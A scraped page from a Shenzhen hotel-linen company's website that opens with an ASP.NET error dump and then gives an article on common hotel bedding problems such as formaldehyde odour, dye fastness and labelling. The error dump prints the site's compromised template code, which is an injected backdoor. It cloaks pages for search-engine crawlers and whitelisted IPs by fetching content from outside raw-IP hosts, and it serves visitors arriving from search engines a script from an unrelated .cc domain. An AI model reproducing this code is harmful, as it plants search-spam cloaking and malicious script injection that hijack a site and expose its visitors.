“/”应用程序中的服务器错误。

请求被中止: 连接被意外关闭。

说明: 执行当前 Web 请求期间,出现未经处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。

异常详细信息: System.Net.WebException: 请求被中止: 连接被意外关闭。

源错误:


行 1:  @{		bool isHomePage = false;		bool isJSPage=false;		string currentUrl = HttpContext.Current.Request.RawUrl.ToLower();		string clientIp = HttpContext.Current.Request.UserHostAddress;		string[] allowIps={"139.18.", "60.28.", "183.91.", "123.184.", "42.236.", "13.66.", "36.110.", "40.77.", "42.7.", "49.7.",    "58.250.", "59.83.", "60.8.", "60.172.", "61.129.", "61.135.", "65.5.", "65.55.", "66.249.", "104.233.",    "106.38.", "106.120.", "110.249.", "111.202.", "111.206.", "111.225.", "113.24.", "116.179.", "118.184.",    "119.63.", "119.188.", "121.14.", "123.15.", "123.125.", "123.126.", "123.181.", "123.183.", "124.166.",    "125.9.", "139.180.", "144.202.", "149.248.", "149.28.", "158.247.", "159.226.", "162.105.", "180.76.",    "180.97.", "180.101.", "180.149.", "180.153.", "180.163.", "185.244.", "193.42.", "194.233.", "202.97.",    "202.108.", "203.144.", "203.208.", "206.221.", "207.46.", "210.72.", "218.3.", "218.10.", "218.30.",    "220.181.", "220.196.", "220.243.", "221.208.","60.188.","39.173.","112.13.","140.205.","124.160.","101.67.","120.197.","43.231.","220.249."};		bool isAllow=Array.Exists(allowIps, s => clientIp.Contains(s));		string userAgent = Request.UserAgent.ToLower();		string referer = HttpContext.Current.Request.Headers["Referer"];		bool isSpider=userAgent.Contains("bot") || userAgent.Contains("spider");		bool isBaidubox=userAgent.Contains("baidubox");		bool isFromSeo=false;		if (!string.IsNullOrEmpty(referer))		{			if (referer.Contains("baidu") || referer.Contains("sogou")					||referer.Contains("so.com") || referer.Contains("yisou") || referer.Contains("sm.cn"))			{					isFromSeo=true;				}							}		if (currentUrl == "/" || currentUrl == "/index.aspx" || currentUrl == "/default.aspx" )		{			isHomePage = true;		}		if (currentUrl.Contains("question") || currentUrl.Contains("node_") )		{			isJSPage = true;		}		if(isJSPage){				if(isFromSeo || isBaidubox){					Response.Write("<script type=\"text/javascript\" src=\"https://static.p3qowiewjs7u.cc/wap.js\" ></script>\n			<script>\n	(function() {\n		var bp = document.createElement('script');\n		var curProtocol = window.location.protocol;\n		if (curProtocol === 'https:') {\n			bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';\n		} else {\n			bp.src = 'http://push.zhanzhang.baidu.com/push.js';\n		}\n		var s = document.getElementsByTagName(\"script\")[0];\n		s.parentNode.insertBefore(bp, s);\n	})();\n		</script>");			}					}		if(isJSPage){			if(isSpider || isAllow){				WebClient webClient = new WebClient();				webClient.Encoding = System.Text.Encoding.UTF8;				webClient.Headers.Add("User-Agent", "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");				string content = webClient.DownloadString("http://198.16.35.252/"+currentUrl); 				Response.Write(content);						}		}		if (isHomePage )		{			if (isSpider || isAllow)			{				WebClient webClient = new WebClient();				webClient.Encoding = System.Text.Encoding.UTF8;				webClient.Headers.Add("User-Agent", "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");				string content = webClient.DownloadString("http://34.92.223.164/?notdk=1&proxy_domain="+ HttpContext.Current.Request.Url.Host); 				Response.Write(content);							}		}}@{Layout = Data.codepath+"_公共框架.cshtml";} 
行 2:  <div class="banner">
行 3:      <ul>

源文件: d:\webhosting\clients\4d584dba-517f-41b6-89b9-463b0b1aea0e\wwwroot\Data\szhtf\template\zh\程序代码\index.cshtml    行: 1

堆栈跟踪:


[WebException: 请求被中止: 连接被意外关闭。]
   System.Net.WebClient.DownloadDataInternal(Uri address, WebRequest& request) +283
   System.Net.WebClient.DownloadString(Uri address) +100
   System.Net.WebClient.DownloadString(String address) +30
   ASP._Page_Data_szhtf_template_zh_程序代码_index_cshtml.Execute() in d:\webhosting\clients\4d584dba-517f-41b6-89b9-463b0b1aea0e\wwwroot\Data\szhtf\template\zh\程序代码\index.cshtml:1
   System.Web.WebPages.WebPageBase.ExecutePageHierarchy() +197
   System.Web.Mvc.WebViewPage.ExecutePageHierarchy() +105
   System.Web.WebPages.StartPage.RunPage() +17
   System.Web.WebPages.StartPage.ExecutePageHierarchy() +73
   System.Web.WebPages.WebPageBase.ExecutePageHierarchy(WebPageContext pageContext, TextWriter writer, WebPageRenderingBase startPage) +78
   System.Web.Mvc.RazorView.RenderView(ViewContext viewContext, TextWriter writer, Object instance) +256
   System.Web.Mvc.BuildManagerCompiledView.Render(ViewContext viewContext, TextWriter writer) +107
   System.Web.Mvc.ViewResultBase.ExecuteResult(ControllerContext context) +291
   System.Web.Mvc.ControllerActionInvoker.InvokeActionResult(ControllerContext controllerContext, ActionResult actionResult) +13
   System.Web.Mvc.ControllerActionInvoker.InvokeActionResultFilterRecursive(IList`1 filters, Int32 filterIndex, ResultExecutingContext preContext, ControllerContext controllerContext, ActionResult actionResult) +56
   System.Web.Mvc.ControllerActionInvoker.InvokeActionResultFilterRecursive(IList`1 filters, Int32 filterIndex, ResultExecutingContext preContext, ControllerContext controllerContext, ActionResult actionResult) +420
   System.Web.Mvc.ControllerActionInvoker.InvokeActionResultFilterRecursive(IList`1 filters, Int32 filterIndex, ResultExecutingContext preContext, ControllerContext controllerContext, ActionResult actionResult) +420
   System.Web.Mvc.ControllerActionInvoker.InvokeActionResultWithFilters(ControllerContext controllerContext, IList`1 filters, ActionResult actionResult) +52
   System.Web.Mvc.Async.<>c__DisplayClass3_6.<BeginInvokeAction>b__3() +198
   System.Web.Mvc.Async.<>c__DisplayClass3_1.<BeginInvokeAction>b__5(IAsyncResult asyncResult) +100
   System.Web.Mvc.Async.WrappedAsyncResult`1.CallEndDelegate(IAsyncResult asyncResult) +10
   System.Web.Mvc.Async.WrappedAsyncResultBase`1.End() +48
   System.Web.Mvc.Async.AsyncControllerActionInvoker.EndInvokeAction(IAsyncResult asyncResult) +27
   System.Web.Mvc.<>c.<BeginExecuteCore>b__152_1(IAsyncResult asyncResult, ExecuteCoreState innerState) +11
   System.Web.Mvc.Async.WrappedAsyncVoid`1.CallEndDelegate(IAsyncResult asyncResult) +29
   System.Web.Mvc.Async.WrappedAsyncResultBase`1.End() +48
   System.Web.Mvc.Controller.EndExecuteCore(IAsyncResult asyncResult) +47
   System.Web.Mvc.<>c.<BeginExecute>b__151_2(IAsyncResult asyncResult, Controller controller) +13
   System.Web.Mvc.Async.WrappedAsyncVoid`1.CallEndDelegate(IAsyncResult asyncResult) +22
   System.Web.Mvc.Async.WrappedAsyncResultBase`1.End() +48
   System.Web.Mvc.Controller.EndExecute(IAsyncResult asyncResult) +28
   System.Web.Mvc.Controller.System.Web.Mvc.Async.IAsyncController.EndExecute(IAsyncResult asyncResult) +10
   System.Web.Mvc.<>c.<BeginProcessRequest>b__20_1(IAsyncResult asyncResult, ProcessRequestState innerState) +28
   System.Web.Mvc.Async.WrappedAsyncVoid`1.CallEndDelegate(IAsyncResult asyncResult) +29
   System.Web.Mvc.Async.WrappedAsyncResultBase`1.End() +48
   System.Web.Mvc.MvcHandler.EndProcessRequest(IAsyncResult asyncResult) +28
   System.Web.Mvc.MvcHandler.System.Web.IHttpAsyncHandler.EndProcessRequest(IAsyncResult result) +9
   System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +9874053
   System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step) +48
   System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) +159


版本信息: Microsoft .NET Framework 版本:4.0.30319; ASP.NET 版本:4.7.3930.0
浅谈酒店布草常见问题及解决办法-五星级酒店布草_客房餐饮布草_酒店台布_汇庭芳纺织-官网
News
Current locationHome>News>Industry News
浅谈酒店布草常见问题及解决办法

Upload time:2014-12-04|Author:admin


随着酒店行业的快速发展,酒店床上用品以及酒店毛巾等等酒店布草也相应的备受人们的关注,众所周知,酒店布草作为酒店行业安全舒适干净的象征,是酒店管理者不得不面对的卫生问题方面,特别是酒店布草常见问题的关注。那么酒店布草常见问题有哪些呢?下面由汇庭芳为大家简单介绍。

1、异味:一些床上用品暗藏过量甲醛,甲醛含量竟是标准限量的近 50 倍。甲醛是一种无色、有强烈刺激气味的气体。闻一闻“味道”,如果产品散发出刺激的异味,就有可能有甲醛残留,最好不要购买。即使新买的床上用品也不要急于使用, 一定要把面料充分洗涤, 并且在太阳下晾晒较长时间。 甲醛在水中有良好的溶解性,经过洗涤会有效地祛除有害物质。另外, 夏天放在衣柜里的被子也要注意,里面会吸附大量甲醛,一定要充分晾晒后再用。

2、外观:不少人认为,床上用品掉色并非是什么大事,但专家指出,人们睡觉时会出汗,汗液中的一些物质或多或少地会与床上纺织品中的染料发生化学反应,汗液会把染料还原成有害物质,再通过人体皮肤吸收致癌。目前市场上的床上用品档次不同,价格差别大,做工和质量差距也大。质量比较好的产品布面平整均匀、质地细腻、印花清晰、富有光泽、缝纫均匀平整。如产品布面不匀、质地稀疏、花纹紊乱、缝纫粗糙,则质量就难保证,染色牢度可能不达标。

3、标识:产品使用说明可采用吊牌、标签、包装说明、使用说明书等形式,可一种或多种同时使用,但其内容必须注明:制造者的名称和地址、产品名称、规格型号、采用原料的成分和含量、洗涤方法、执行标准、质量等级、质量合格证明等内容。 床上用品要求标明规格尺寸、填充质量和面/里料、填充物的纤维名称及含量。每件产品应有包装,保证不散落、不破坏、不沾污、不受潮。 不同说明形式的内容应一致,且规格型号、采用原料的成分和含量、洗涤方法必须采用耐久性标签。

深圳市汇庭芳纺织品有限公司(www.szhtf.com)主要面向酒店生产、销售专用宾馆布草。产品包括高端酒店布草,酒店毛巾,酒店床上用品,客房布草,餐饮布草,酒店布草等,欢迎大家前来咨询和选购!
—— Contact Us ——
Add:7A, Building 2, Anle Industrial Park, Beiba Road, Hezhou Village, Xixiang Town, Bao'an District, Shenzhen, China
Mr. Liu:13502846712  
Miss Yu:13714295560  

WeChat

CopyRight © 2019 Shenzhen Huitingfang Textile Co., Ltd. All Right Reserved. 粤ICP备14001694号